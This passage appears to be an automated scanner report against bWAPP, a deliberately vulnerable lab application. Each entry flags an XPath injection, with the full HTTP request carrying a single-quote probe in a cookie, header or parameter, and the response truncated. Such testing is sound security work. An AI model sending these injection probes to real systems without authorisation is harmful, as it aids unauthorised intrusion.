<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.68. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [security_level cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:08:34 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.69. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [security_level parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

form_security_level=submit&security_level=1'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:09:34 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13438

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.70. http://192.168.52.147/bWAPP/ba_weak_pwd.php [Base64-decoded value of the secret cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The Base64-decoded value of the secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Base64-decoded value of the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 21
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2fJw%3d%3d
Connection: close

bug=6&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:11:04 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12704

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.71. http://192.168.52.147/bWAPP/ba_weak_pwd.php [Referer HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:12:03 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.72. http://192.168.52.147/bWAPP/ba_weak_pwd.php [User-Agent HTTP header]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:11:54 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.73. http://192.168.52.147/bWAPP/ba_weak_pwd.php [admin cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The admin cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the admin cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0'; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:10:46 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.74. http://192.168.52.147/bWAPP/ba_weak_pwd.php [bug parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1'&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:09:45 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.75. http://192.168.52.147/bWAPP/ba_weak_pwd.php [form_bug parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The form_bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:09:56 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.76. http://192.168.52.147/bWAPP/ba_weak_pwd.php [form_security_level parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The form_security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit'&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:09:58 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13332

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.77. http://192.168.52.147/bWAPP/ba_weak_pwd.php [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php?1'=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 21
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
Connection: close

bug=6&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:11:31 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12704

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.78. http://192.168.52.147/bWAPP/ba_weak_pwd.php [name of an arbitrarily supplied body parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The name of an arbitrarily supplied body parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied body parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 25
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
Connection: close

bug=6&form_bug=submit&1'=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:11:18 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12704

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.79. http://192.168.52.147/bWAPP/ba_weak_pwd.php [secret cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2f'; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:10:32 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.80. http://192.168.52.147/bWAPP/ba_weak_pwd.php [security_level cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The security_level cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1'; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:10:21 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.81. http://192.168.52.147/bWAPP/ba_weak_pwd.php [security_level parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The security_level parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the security_level parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

form_security_level=submit&security_level=1'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:10:17 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13329

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.82. http://192.168.52.147/bWAPP/ba_weak_pwd.php [top_security_nossl cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The top_security_nossl cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the top_security_nossl cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/ba_weak_pwd.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_weak_pwd.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317'

bug=1&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:10:58 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.83. http://192.168.52.147/bWAPP/bof_1.php [Base64-decoded value of the secret cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/bof_1.php

Issue detail

The Base64-decoded value of the secret cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Base64-decoded value of the secret cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/bof_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/bof_1.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2fJw%3d%3d; admin=0; movie_genre=horror

form_security_level=submit&security_level=1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:14:05 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13166

<!DOCTYPE html>
